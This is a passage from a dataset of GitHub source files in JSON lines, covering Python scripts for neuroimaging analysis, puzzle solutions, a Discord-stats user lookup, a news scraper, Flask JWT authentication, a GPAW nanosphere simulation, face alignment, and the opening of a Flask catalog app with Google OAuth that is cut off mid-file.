+{"seq_id":"43001832692","text":"from extract_unrelated420 import extract_sc, extract_fc_corr, extract_fc_prec\nfrom gen_coupling import gen_scfc_coupling\nfrom GLM import glm\nfrom extract_herit941 import extract_herit_sc, extract_herit_fc, gen_herit_scfc_couping, standardize\nimport scipy.io as sio\nimport numpy as np\nimport os\nimport scipy.stats as stats\n\ncwd = os.getcwd()\ndata_dir = cwd + '/data/'\n\nall_subj = np.genfromtxt(data_dir + 'subjects_all997.txt', dtype='int')\nunrelated_subj = np.genfromtxt(\n    data_dir + 'subjects_unrelated420.txt', dtype='int')\n\nroi_number = 392\nopt_gamma = 0.3\n\ndef extract_data():\n    extract_sc('sift2volnorm')\n    extract_fc_corr('hpf')\n    extract_fc_prec('hpf')\n\n\nextract_data()\ngen_scfc_coupling('sift2volnorm', 'prec', 'hpf')\ngen_scfc_coupling('sift2volnorm', 'corr', 'hpf')\nglm('prec', 'hpf')\nglm('corr', 'hpf')\nextract_herit_sc('sift2volnorm')\nextract_herit_fc(opt_gamma)\nstandardize('sc')\nfor fc_type in ['prec', 'corr']:\n\tfor sess in range(1,5):\n\t\tgen_herit_scfc_couping('sift2volnorm', fc_type, sess)\n\t\tstandardize('fc', fc_type, sess)\n\t\tstandardize('cp', fc_type, sess)\n\n","repo_name":"zijin-gu/scfc-coupling","sub_path":"source/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"}
+{"seq_id":"10834990374","text":"from prob_4 import is_palindromic\n\nsum_rev = lambda n: n + int(str(n)[::-1])\n\ndef lychrel(n):\n    n = sum_rev(n)\n    count = 1\n    while not is_palindromic(n):\n        n = sum_rev(n)\n        count += 1\n        if count > 49:\n            return True\n    return False\n\nprint(sum([lychrel(n) for n in range(10000)]))\n","repo_name":"lordgrenville/project_euler","sub_path":"prob_55.py","file_name":"prob_55.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2982837193","text":"menus = {\n    \"value\": {\n        \"beef burger\": 5.69,\n        \"fries\": 1.00,\n        \"fizzy drink\": 1.00\n    },\n    \"cheezy\": {\n        \"cheeseburger\": 6.69,\n        \"fries\": 1.00,\n        \"fizzy drink\": 1.00\n    },\n    \"super\": {\n        \"cheeseburger\": 6.69,\n        \"large fries\": 2.00,\n        \"smoothie\": 2.00\n    }\n}\nprint(menus)\n","repo_name":"ASDenne/burger-ordering","sub_path":"store menues.py","file_name":"store menues.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"42453570479","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n
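# Approach: a post-order traversal returns, for each node, the best downward\n# path gain that starts at that node (using at most one child branch), while\n# recording every candidate path sum - including left + node + right bridges -\n# in self.candidates; the answer is the maximum candidate.\nclass 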
Solution:\n    def maxPathSum(self, root: Optional[TreeNode]) -> int:\n        self.candidates = []\n        self.traverse(root)\n        return max(self.candidates) if self.candidates else 0\n\n    def traverse(self, node):\n        if not node:\n            return 0\n\n        left = self.traverse(node.left)\n        right = self.traverse(node.right)\n\n        left_self = left + node.val\n        right_self = right + node.val\n\n        left_right_self = left + right + node.val\n        ret_val = max(left_self, right_self, node.val)\n\n        self.candidates.extend([ret_val, left_right_self])\n\n        return ret_val\n","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0124. Binary Tree Maximum Path Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"28721701447","text":"def zerosAtTheEnd(lst:list) -> list: # the input is a list.\r\n    for i in range(len(lst) - 1, -1, -1): # iterate backwards so pops never shift the items still to be visited.\r\n        if lst[i] == 0: # when it finds a zero, it removes it from its position and appends it at the end.\r\n            lst.pop(i)\r\n            lst.append(0)\r\n    return lst\r\n\r\nif __name__ == \"__main__\":\r\n    n = int(input(\"Enter the number of real numbers the list will contain: \"))\r\n    lst = [int(input(\"Enter a number: \")) for x in range(n)]\r\n    res = zerosAtTheEnd(lst)\r\n    print(res)\r\n","repo_name":"JanaRubiano/Repo-10","sub_path":"point3.py","file_name":"point3.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73870082707","text":"from handle_data.connect_database import *\nfrom handle_data.get_data import *\nimport urllib.parse\n\ndef dropdown_suggestions(query):\n    conn, cur = open_db()\n    cur.execute(\"SELECT username, nickname FROM users WHERE username LIKE ? OR nickname LIKE ?\", ('%' + query + '%', '%' + query + '%'))\n    rows = cur.fetchall()\n    results = [{'username': row[0], 'nickname': row[1]} for row in rows]\n    close_db()\n    return results\n\ndef get_user_id(query):\n    decoded_query = urllib.parse.unquote(query)\n    if \"|\" in decoded_query:\n        name = decoded_query.split('|')[0].strip().lower()\n    else:\n        name = decoded_query.strip().lower()\n    conn, cur = open_db()\n
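    # Parameterized query: the ? placeholders are bound by the sqlite driver\n    # itself, so the user-supplied name is never spliced into the SQL string\n    # (which would invite SQL injection).\n    cur.execute(\"SELECT id FROM users WHERE LOWER(username) = ? 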
OR LOWER(nickname) = ?\", ((name, name)))\n user_id = cur.fetchone()\n print(user_id)\n if(user_id):\n user_id = user_id[0]\n return user_id\n close_db()\n return name\n\ndef get_user_data(id):\n sql = \"WHERE author_id = \" + str(id)\n conn, cur = open_db()\n user_data, formatted_date = user_info(cur, id)\n data = {\n \"picture\": user_data[0],\n \"username\": user_data[1],\n \"nickname\": user_data[2],\n \"date\": formatted_date,\n \"gesendete_nachrichten_text\": messages_count(cur, user=sql),\n \"nachrichten_pro_tag_text\": messages_average(cur, user=sql),\n \"aktivität_nach_wochentage_chart\": messages_per_weekday(cur, user=sql),\n \"aktivität_nach_stunden_chart\": messages_per_one_day(cur, user=sql),\n \"channel_rangliste_chart\": channel_leaderboard(cur, user=sql),\n \"spieler_rangliste_platzierung\": user_rank(cur, id),\n }\n close_db()\n return data","repo_name":"Herundur/banura_statistics_v2","sub_path":"webserver/handle_data/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20014983760","text":"from bs4 import BeautifulSoup\nfrom Opener import opener\nimport requests\nimport json\n\nname = 'sz'\n\n\ndef get_opener():\n url = 'https://www.sueddeutsche.de/'\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36'}\n\n # get link to opener\n response = requests.get(url, headers)\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n opener_link = soup.find(\"main\").find('a')['href']\n\n # get data on opener\n response = requests.get(opener_link, headers)\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n\n # headline, keywords and authors are in meta tags\n headline = soup.find(\"meta\", {\"property\": \"og:title\"})['content']\n keywords = soup.find(\"meta\", {\"name\": \"keywords\"})['content'].split(',')\n authors = soup.find_all(\"meta\", {\"name\":\"author\"})\n authors = [a['content'] for a in authors]\n\n # ressort is in java script\n data = soup.find(\"script\", {\"type\":\"text/javascript\"})\n data = str(data).split('[')[1].split(']')[0]\n data = json.loads(data)\n ressort = data.get(\"ressort\")\n sub_ressort = data.get(\"thema\")\n\n # initialise opener\n op = opener(headline, opener_link, authors, ressort, sub_ressort, keywords, name)\n return op\n\n","repo_name":"henrythier/news","sub_path":"outlets/sz.py","file_name":"sz.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74172037584","text":"#coding=utf-8\n#author:Kingving time:2020/7/27 1:01\n\n'''把数组[0,1,1,0,1,1,0,1,1,1,0,0]中所有的1排到左侧,0排到有右侧;'''\n\na=[0,1,1,0,1,1,0,1,1,1,0,0]\ns=range(len(a))[::-1]\nfor i in s:\n for j in range(i):\n if a[j] %s degree\" % (round(theta, 2)))\nprint(\"Execution time ---> %s milliseconds\\n\" % time)\n","repo_name":"muneebsaddal/document-distance-algorithm","sub_path":"DocumentDistance.py","file_name":"DocumentDistance.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20563407655","text":"from datetime import datetime, timedelta\nfrom functools import wraps\nfrom hashlib import sha256\nfrom uuid import uuid4\n\nimport jwt\nfrom config import app\nfrom flask import abort, g, make_response\nfrom flask_jwt_extended import 
get_jwt, verify_jwt_in_request\nfrom flask_jwt_extended.exceptions import NoAuthorizationError\nfrom jwt import DecodeError, ExpiredSignatureError, InvalidSignatureError\nfrom model.users import User\n\n\ndef gen_jwts(user: User, with_refresh:bool=True):\n \"\"\"\n Generates a new JWT access and refresh token for a given user\n\n Args:\n user (User):\n The user the tokens should be generated for\n \n with_refresh (bool):\n True if the refresh token should be generated with the access token. False if not.\n\n Returns:\n Response(partial) -> Response containing the tokens\n \"\"\"\n\n ctime = datetime.utcnow()\n\n # create fingerprint cookie contents\n fingerprint = str(uuid4())\n\n # create refresh token\n rtoken = jwt.encode({\n 'sub': user.id,\n 'jti': uuid4().hex,\n 'type': 'refresh',\n # hash fingerprint\n 'fingerprint': sha256(fingerprint.encode('utf-8')).hexdigest(),\n 'iat': ctime,\n 'exp': ctime + timedelta(**app.config.get('JWT_REFRESH_LIFESPAN')),\n }, app.config.get('SECRET_KEY'), algorithm=\"HS256\")\n\n # create access token\n atoken = jwt.encode({\n 'sub': user.id,\n 'type': 'access',\n 'iat': ctime,\n 'exp': ctime + timedelta(**app.config.get('JWT_ACCESS_LIFESPAN')),\n }, app.config.get('SECRET_KEY'), algorithm=\"HS256\")\n\n body = {'access_token': atoken, 'message': 'Success'}\n \n if with_refresh:\n body.update({'refresh_token': rtoken})\n \n res = make_response(body)\n\n # set fingerprint cookie\n res.set_cookie('FuelGuru_Secure_Fgp', fingerprint,\n max_age=timedelta(**app.config.get('JWT_REFRESH_LIFESPAN')),\n expires=(\n ctime + timedelta(**app.config.get('JWT_REFRESH_LIFESPAN'))),\n httponly=True,\n secure=not app.config.get('IS_DEV'),\n samesite='Strict')\n\n return res\n\n\ndef _verify_token(is_admin=False):\n try:\n # get JWT from request\n verify_jwt_in_request()\n\n data = get_jwt()\n\n # get user from JWT\n current_user: User = User.query.get(data.get('sub'))\n\n # dont authenticate if the token doesnt correspond to a real user\n if not current_user:\n abort(make_response({\"error\": \"Token is invalid\"}, 401))\n\n # dont authenticate if the corresponding user has been deleted\n if current_user.deleted_at:\n abort(make_response({\"error\": \"This user has been deleted\"}, 401))\n\n # dont authenticate if the route requires admin privledges\n # but the user does not have admin\n if is_admin:\n if current_user.user_type.is_admin != True:\n abort(make_response(\n {'error': 'The user is not authorized to make this request'}, 403))\n\n except NoAuthorizationError as e:\n abort(make_response({'error': str(e)}, 401))\n\n except InvalidSignatureError:\n abort(make_response({\"error\": 'Token is invalid'}, 401))\n\n except ExpiredSignatureError:\n abort(make_response({\"error\": 'Token is expired'}, 401))\n\n except DecodeError:\n return abort(make_response(\n {'error': 'Token signature is invalid'}, 401))\n\n g.current_user = current_user\n\n\ndef token_required(f):\n \"\"\"\n Wraps a functions and makes it token required\n\n Args:\n f (function): The function to wrap\n Returns:\n function -> The decorator function\n \"\"\"\n\n @wraps(f)\n def decorated(*args, **kwargs):\n _verify_token()\n return f(*args, **kwargs)\n\n return decorated\n\n\ndef admin_required(f):\n \"\"\"\n Wraps a functions and makes it admin required\n\n Args:\n f (function): The function to wrap\n Returns:\n function -> The decorator function\n \"\"\"\n\n @wraps(f)\n def decorated(*args, **kwargs):\n _verify_token(True)\n return f(*args, **kwargs)\n\n return 
decorated\n","repo_name":"SWEN3920-CAPSTONE/Fuel-Guru","sub_path":"controller/routes/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8571274528","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport json\nimport os\nimport pickle\nimport shutil\n\nimport cv2\nimport numpy as np\nfrom ml_serving.drivers import driver\n\nfrom app.recognize import defaults\nfrom app.tools import bg_remove\nfrom app.tools import images\nfrom app.tools import downloader\nfrom app.tools import dataset\nfrom app.tools import utils\n\n\nDEFAULT_INPUT_DIR = \"./data/faces\"\n\n\nclass Aligner:\n def __init__(\n self,\n input_dir=DEFAULT_INPUT_DIR,\n clarified=False,\n clear_input_dir=False,\n download=None,\n aligned_dir=defaults.ALIGNED_DIR,\n complementary_align=False,\n min_face_size=defaults.MIN_FACE_SIZE,\n image_size=defaults.IMAGE_SIZE,\n margin=defaults.IMAGE_MARGIN,\n face_detection_path=defaults.FACE_DETECTION_PATH,\n bg_remove_path=None,\n device=defaults.DEVICE,\n ):\n self.input_dir = input_dir\n self.clarified = clarified\n self.aligned_dir = aligned_dir\n self.complementary_align = complementary_align or clarified\n self.min_face_size = min_face_size\n self.image_size = image_size\n self.margin = margin\n self.face_detection_path = face_detection_path\n self.bg_remove_path = None if clarified else bg_remove_path\n self.device = device\n if clear_input_dir:\n shutil.rmtree(self.input_dir, ignore_errors=True)\n if download is not None:\n err = downloader.Downloader(download, destination=self.input_dir).extract()\n if err is not None:\n raise RuntimeError(err)\n self.serving: driver.ServingDriver = None\n self.threshold = 0.5\n self.min_face_area = self.min_face_size ** 2\n\n def align(self, images_limit=None):\n\n if self.complementary_align:\n utils.print_fun('Complementary align %simages to %s' % (\"clarified \" if self.clarified else \"\", self.aligned_dir))\n else:\n utils.print_fun('Align images to %s' % self.aligned_dir)\n\n aligned_dir = os.path.expanduser(self.aligned_dir)\n bounding_boxes_filename = os.path.join(aligned_dir, 'bounding_boxes.txt')\n align_filename = os.path.join(aligned_dir, 'align.pkl')\n\n align_data_args = {\n \"min_face_size\": self.min_face_size,\n \"image_size\": self.image_size,\n \"margin\": self.margin,\n # used for dataset alignment and do not used for clarified alignment\n # \"bg_remove_path\": self.bg_remove_path,\n }\n\n align_data = {}\n if os.path.isfile(align_filename):\n utils.print_fun(\"Check previous align data\")\n with open(align_filename, 'rb') as infile:\n (align_data_args_loaded, align_data_loaded) = pickle.load(infile)\n if align_data_args == align_data_args_loaded:\n utils.print_fun(\"Loaded data about %d aligned classes\" % len(align_data_loaded))\n align_data = align_data_loaded\n else:\n utils.print_fun(\"Previous align data is for another arguments, deleting existing data\")\n shutil.rmtree(aligned_dir, ignore_errors=True)\n\n if not os.path.isdir(aligned_dir):\n utils.print_fun(\"Creating output dir\")\n os.makedirs(aligned_dir)\n\n # Store some git revision info in a text file in the log directory\n src_path, _ = os.path.split(os.path.realpath(__file__))\n # facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))\n loaded_dataset = dataset.get_dataset(self.input_dir)\n loaded_dataset_meta = 
dataset.get_meta(loaded_dataset)\n\n utils.print_fun('Creating networks and loading parameters')\n\n # Load driver\n self._load_driver()\n\n bg_rm_drv = bg_remove.get_driver(self.bg_remove_path)\n\n bounding_boxes_contents = \"\"\n\n # clear not actual previous aligned stored data\n if not self.complementary_align and len(align_data) > 0:\n stored_classes = []\n for cls in loaded_dataset:\n stored_classes.append(cls.name)\n for adcl in list(align_data):\n if adcl not in stored_classes:\n del align_data[adcl]\n\n nrof_images_total = 0\n nrof_images_skipped = 0\n nrof_images_cached = 0\n nrof_successfully_aligned = 0\n nrof_has_meta = 0\n for cls in loaded_dataset:\n output_class_dir = os.path.join(aligned_dir, cls.name)\n output_class_dir_created = False\n # meta_file = None\n aligned_class_images = []\n if cls.name in align_data:\n align_data_class = align_data[cls.name]\n else:\n align_data_class = {}\n for image_path in cls.image_paths:\n # if os.path.basename(image_path) == dataset.META_FILENAME:\n # meta_file = image_path\n # continue\n nrof_images_total += 1\n nrof_images_skipped += 1\n filename = os.path.splitext(os.path.split(image_path)[1])[0]\n output_filename = os.path.join(output_class_dir, filename + '.png')\n if not os.path.exists(output_filename):\n try:\n img = cv2.imread(image_path, cv2.IMREAD_COLOR).astype(np.float32)\n except Exception as e:\n error_message = '{}: {}'.format(image_path, e)\n utils.print_fun('ERROR: %s' % error_message)\n continue\n\n img_hash = hashlib.sha1(img.tostring()).hexdigest()\n if image_path in align_data_class:\n if 'hash' in align_data_class[image_path]:\n if align_data_class[image_path]['hash'] == img_hash:\n all_aligned_exists = True\n if 'aligned' in align_data_class[image_path]:\n for a in align_data_class[image_path]['aligned']:\n if not os.path.isfile(a):\n all_aligned_exists = False\n break\n if all_aligned_exists:\n if 'aligned' in align_data_class[image_path]:\n aligned_class_images.extend(\n list(align_data_class[image_path]['aligned'].keys()))\n for _, a in enumerate(align_data_class[image_path]['aligned']):\n b = align_data_class[image_path]['aligned'][a]\n bounding_boxes_contents += \\\n '%s %d %d %d %d cached\\n' % (a, b[0], b[1], b[2], b[3])\n nrof_images_skipped -= 1\n else:\n bounding_boxes_contents += \\\n '%s ERROR no aligned cached\\n' % image_path\n\n nrof_images_cached += 1\n continue\n\n align_data_class[image_path] = {'hash': hashlib.sha1(img.tostring()).hexdigest()}\n utils.print_fun(image_path)\n\n if len(img.shape) <= 2:\n utils.print_fun('WARNING: Unable to align \"%s\", shape %s' % (image_path, img.shape))\n bounding_boxes_contents += '%s ERROR invalid shape\\n' % image_path\n continue\n\n if self.clarified:\n\n # get clarified image as is and make one with aligned size\n bounding_boxes = np.stack([[0, 0, img.shape[1], img.shape[0]]])\n face_crop_margin = 0\n\n else:\n\n # detect faces previously with bg_remove if set, if not found, try to detect w/o bg_remove\n if bg_rm_drv is not None:\n img = bg_rm_drv.apply_mask(img)\n\n bounding_boxes = None\n if bg_rm_drv is not None:\n img_masked = bg_rm_drv.apply_mask(img)\n bounding_boxes = self._get_boxes(image_path, img_masked)\n if bounding_boxes is None:\n utils.print_fun('WARNING: no faces on image with removed bg, trying without bg removing')\n\n if bounding_boxes is None or bg_rm_drv is not None:\n bounding_boxes = self._get_boxes(image_path, img)\n\n if bounding_boxes is None:\n bounding_boxes_contents += '%s ERROR no faces detected\\n' % image_path\n continue\n\n 
face_crop_margin = self.margin\n\n imgs = images.get_images(\n img,\n bounding_boxes,\n face_crop_size=self.image_size,\n face_crop_margin=face_crop_margin,\n normalization=None,\n )\n\n align_data_class[image_path]['aligned'] = {}\n for i, cropped in enumerate(imgs):\n nrof_successfully_aligned += 1\n bb = bounding_boxes[i]\n filename_base, file_extension = os.path.splitext(output_filename)\n output_filename_n = \"{}_{}{}\".format(filename_base, i, file_extension)\n bounding_boxes_contents += '%s %d %d %d %d\\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3])\n if not output_class_dir_created:\n output_class_dir_created = True\n if not os.path.exists(output_class_dir):\n os.makedirs(output_class_dir)\n cv2.imwrite(output_filename_n, cropped)\n align_data_class[image_path]['aligned'][output_filename_n] = (bb[0], bb[1], bb[2], bb[3])\n\n if images_limit and nrof_successfully_aligned >= images_limit:\n break\n\n aligned_class_images.extend(list(align_data_class[image_path]['aligned'].keys()))\n\n nrof_images_skipped -= 1\n\n if images_limit and nrof_successfully_aligned >= images_limit:\n break\n\n if os.path.isdir(output_class_dir):\n cls_ = cls.name.replace(' ', '_')\n if cls_ in loaded_dataset_meta:\n with open(os.path.join(output_class_dir, dataset.META_FILENAME), 'w') as mf:\n json.dump(loaded_dataset_meta[cls_], mf)\n\n # clear not existing in input already exists aligned class images\n if not self.complementary_align:\n if os.path.isdir(output_class_dir):\n for f in os.listdir(output_class_dir):\n if f == dataset.META_FILENAME:\n continue\n fp = os.path.join(output_class_dir, f)\n if os.path.isfile(fp) and fp not in aligned_class_images:\n os.remove(fp)\n\n align_data[cls.name] = align_data_class\n\n if images_limit and images_limit <= nrof_successfully_aligned:\n utils.print_fun(\"Limit for aligned images %d is reached\" % images_limit)\n break\n\n dataset.get_meta(loaded_dataset)\n\n # clear not existing in input already exists aligned classes (dirs)\n if not self.complementary_align:\n for d in os.listdir(aligned_dir):\n dd = os.path.join(aligned_dir, d)\n if os.path.isdir(dd) and d not in align_data:\n shutil.rmtree(dd, ignore_errors=True)\n\n with open(bounding_boxes_filename, \"w\") as text_file:\n text_file.write(bounding_boxes_contents)\n\n with open(align_filename, 'wb') as align_file:\n pickle.dump((align_data_args, align_data), align_file, protocol=2)\n\n utils.print_fun('Total number of images: %d' % nrof_images_total)\n if nrof_images_cached > 0:\n utils.print_fun('Number of cached images: %d' % nrof_images_cached)\n if nrof_images_skipped > 0:\n utils.print_fun('Number of skipped images: %d' % nrof_images_skipped)\n if nrof_has_meta > 0:\n utils.print_fun('Number of classes with meta: %d' % nrof_has_meta)\n utils.print_fun('Number of successfully aligned images: %d' % nrof_successfully_aligned)\n\n def _load_driver(self):\n if self.serving is None:\n driver_name = 'openvino'\n if '_edgetpu' in self.face_detection_path and '.tflite' in self.face_detection_path:\n driver_name = 'edgetpu'\n drv = driver.load_driver(driver_name)\n # Instantinate driver\n self.serving = drv()\n self.serving.load_model(\n self.face_detection_path,\n # device=self.device,\n flexible_batch_size=True,\n )\n self.input_name = list(self.serving.inputs.keys())[0]\n if driver_name == 'openvino':\n self.input_size = tuple(list(self.serving.inputs.values())[0][:-3:-1])\n else:\n self.input_size = tuple(list(self.serving.inputs.values())[0][-2:-4:-1])\n self.output_name = 
list(self.serving.outputs.keys())[0]\n\n def _get_boxes(self, image_path, img):\n serving_img = cv2.resize(img, self.input_size, interpolation=cv2.INTER_AREA)\n\n if self.serving.driver_name == 'openvino':\n serving_img = np.transpose(serving_img, [2, 0, 1]).reshape([1, 3, *self.input_size[::-1]])\n else:\n serving_img = serving_img.reshape([1, *self.input_size[::-1], 3]).astype(np.uint8)\n\n raw = self.serving.predict({self.input_name: serving_img})\n\n if self.serving.driver_name == 'edgetpu':\n output = raw\n score = output[2]\n bboxes_raw = output[0].reshape([-1, 4])\n bboxes_raw = bboxes_raw[score > self.threshold]\n bounding_boxes = np.zeros_like(bboxes_raw)\n\n # y1, x1, y2, x2 -> x1, y1, x2, y2\n bounding_boxes[:, 0] = bboxes_raw[:, 1] * img.shape[1]\n bounding_boxes[:, 1] = bboxes_raw[:, 0] * img.shape[0]\n bounding_boxes[:, 2] = bboxes_raw[:, 3] * img.shape[1]\n bounding_boxes[:, 3] = bboxes_raw[:, 2] * img.shape[0]\n else:\n # 7 values:\n # class_id, label, confidence, x_min, y_min, x_max, y_max\n # Select boxes where confidence > factor\n raw = raw[self.output_name].reshape([-1, 7])\n\n bboxes_raw = raw[raw[:, 2] > self.threshold]\n bboxes_raw[:, 3] = bboxes_raw[:, 3] * img.shape[1]\n bboxes_raw[:, 5] = bboxes_raw[:, 5] * img.shape[1]\n bboxes_raw[:, 4] = bboxes_raw[:, 4] * img.shape[0]\n bboxes_raw[:, 6] = bboxes_raw[:, 6] * img.shape[0]\n\n bounding_boxes = np.zeros([len(bboxes_raw), 5])\n\n bounding_boxes[:, 0:4] = bboxes_raw[:, 3:7]\n bounding_boxes[:, 4] = bboxes_raw[:, 2]\n\n # output = output.reshape(-1, 7)\n # bboxes_raw = output[output[:, 2] > self.threshold]\n # Extract 4 values\n # bounding_boxes = bboxes_raw[:, 3:7]\n\n # Get the biggest box: find the box with largest square:\n # (y1 - y0) * (x1 - x0) - size of box.\n bbs = bounding_boxes\n area = (bbs[:, 3] - bbs[:, 1]) * (bbs[:, 2] - bbs[:, 0])\n\n if len(area) < 1:\n utils.print_fun('WARNING: Unable to align \"%s\", n_faces=%s' % (image_path, len(area)))\n return None\n\n num = np.argmax(area)\n if area[num] < self.min_face_area:\n utils.print_fun(\n 'WARNING: Unable to align \"{}\", face found but too small - about {}px '\n 'width against required minimum of {}px. Try adjust parameter --min-face-size'.format(\n image_path, int(np.sqrt(area[num])), self.min_face_size\n )\n )\n return None\n\n bounding_boxes = np.stack([bbs[num]])\n return bounding_boxes\n\n","repo_name":"kibernetika-ai/ponchik","sub_path":"app/dataset/aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44075317681","text":"from ase import Atoms\nfrom gpaw import GPAW\nfrom gpaw.fdtd.poisson_fdtd import FDTDPoissonSolver\nfrom gpaw.fdtd.polarizable_material import (PermittivityPlus,\n PolarizableMaterial,\n PolarizableSphere)\nfrom gpaw.tddft import TDDFT, photoabsorption_spectrum\nfrom gpaw.inducedfield.inducedfield_tddft import TDDFTInducedField\nfrom gpaw.inducedfield.inducedfield_fdtd import FDTDInducedField\nfrom gpaw.mpi import world\nimport numpy as np\n\n# Nanosphere radius (Angstroms)\nradius = 7.40\n\n# Geometry\natom_center = np.array([30., 15., 15.])\nsphere_center = np.array([15., 15., 15.])\nsimulation_cell = np.array([40., 30., 30.])\n\n# Atoms object\natoms = Atoms('Na2', atom_center + np.array([[-1.5, 0.0, 0.0],\n [1.5, 0.0, 0.0]]))\n\n# Permittivity of Gold\n# J. Chem. Phys. 
135, 084121 (2011); http://dx.doi.org/10.1063/1.3626549\neps_gold = PermittivityPlus(data=[[0.2350, 0.1551, 95.62],\n [0.4411, 0.1480, -12.55],\n [0.7603, 1.946, -40.89],\n [1.161, 1.396, 17.22],\n [2.946, 1.183, 15.76],\n [4.161, 1.964, 36.63],\n [5.747, 1.958, 22.55],\n [7.912, 1.361, 81.04]])\n\n# 3) Nanosphere + Na2\nclassical_material = PolarizableMaterial()\nclassical_material.add_component(PolarizableSphere(center=sphere_center,\n radius=radius,\n permittivity=eps_gold))\n\n# Combined Poisson solver\npoissonsolver = FDTDPoissonSolver(classical_material=classical_material,\n qm_spacing=0.5,\n cl_spacing=2.0,\n cell=simulation_cell,\n communicator=world,\n remove_moments=(1, 1))\npoissonsolver.set_calculation_mode('iterate')\n\n# Combined system\natoms.set_cell(simulation_cell)\natoms, qm_spacing, gpts = poissonsolver.cut_cell(atoms, vacuum=4.0)\n\n# Initialize GPAW\ngs_calc = GPAW(gpts=gpts,\n nbands=-1,\n poissonsolver=poissonsolver)\natoms.set_calculator(gs_calc)\n\n# Ground state\nenergy = atoms.get_potential_energy()\n\n# Save state\ngs_calc.write('gs.gpw', 'all')\n\n# Initialize TDDFT and FDTD\nkick = [0.001, 0.000, 0.000]\ntime_step = 10\niterations = 1500\n\ntd_calc = TDDFT('gs.gpw')\ntd_calc.absorption_kick(kick_strength=kick)\ntd_calc.hamiltonian.poisson.set_kick(kick)\n\n# Attach InducedFields to the calculation\nfrequencies = [2.05, 2.60]\nwidth = 0.15\ncl_ind = FDTDInducedField(paw=td_calc,\n frequencies=frequencies,\n width=width)\nqm_ind = TDDFTInducedField(paw=td_calc,\n frequencies=frequencies,\n width=width)\n\n# Propagate TDDFT and FDTD\ntd_calc.propagate(time_step, iterations, 'dm.dat', 'td.gpw')\n\n# Save results\ntd_calc.write('td.gpw', 'all')\ncl_ind.write('cl.ind')\nqm_ind.write('qm.ind')\n\nphotoabsorption_spectrum('dm.dat', 'spec.3.dat', width=width)\n","repo_name":"ray38/gpawDFT","sub_path":"doc/documentation/electrodynamics/gold+na2_nanosphere_inducedfield.py","file_name":"gold+na2_nanosphere_inducedfield.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13453161914","text":"#!/usr/bin/env python\n\"\"\"Python code for itemcatalog application.\"\"\"\n\nfrom flask import Flask, render_template, request\nfrom flask import redirect, jsonify, url_for, flash, make_response\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import desc, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, User, Catalog, CatalogItem\nfrom flask import session as login_session\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nimport random\nimport string\nimport requests\n\napp = Flask(__name__)\n\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\nAPPLICATION_NAME = \"Item Catalog App\"\n\n# Create database session\nengine = create_engine('sqlite:///itemcatalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Create anti-forgery state token\n@app.route('/login')\ndef showLogin():\n state = ''.join(\n random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n login_session['state'] = state\n # return \"The current session state is %s\" % login_session['state']\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Validate state token\n if request.args.get('state') != 
login_session['state']:\n        response = make_response(json.dumps('Invalid state parameter.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    # Obtain authorization code\n    code = request.data\n\n    try:\n        # Upgrade the authorization code into a credentials object\n        oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n        oauth_flow.redirect_uri = 'postmessage'\n        credentials = oauth_flow.step2_exchange(code)\n    except FlowExchangeError:\n        response = make_response(\n            json.dumps('Failed to upgrade the authorization code.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Check that the access token is valid.\n    access_token = credentials.access_token\n    url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n           % access_token)\n\n    h = httplib2.Http()\n    response = h.request(url, 'GET')[1]\n    str_response = response.decode('utf-8')\n    result = json.loads(str_response)\n\n    # If there was an error in the access 